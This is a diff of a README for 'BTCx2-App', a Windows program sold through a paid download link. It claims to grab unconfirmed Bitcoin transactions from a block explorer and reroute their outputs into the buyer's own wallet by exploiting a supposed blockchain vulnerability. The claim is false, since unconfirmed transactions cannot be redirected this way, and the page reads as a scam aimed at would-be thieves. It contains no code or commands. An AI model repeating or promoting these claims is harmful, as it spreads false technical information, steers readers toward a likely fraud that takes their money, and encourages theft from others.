hackingitup247/BCTx-App/README.md

 # BTCx2-App
-blockchain transaction grabber + re-router
-The application, once installed, allows you to select an unconfirmed transaction from blockchain.com/explorer and will reroute the output into a wallet address of your choosing.
+Exploitation of a current vulnerability in the blockchain and its miners due to the flooded nature of the BTC market and the B.C.
+So it won't last forever better make some extra BTC while you can

 requirements - Windows 10

 to get the app visit
  https://satoshidisk.com/pay/C9LSIC
- a little pricy but sooo worth it.
+ a little spendy but sooo worth it.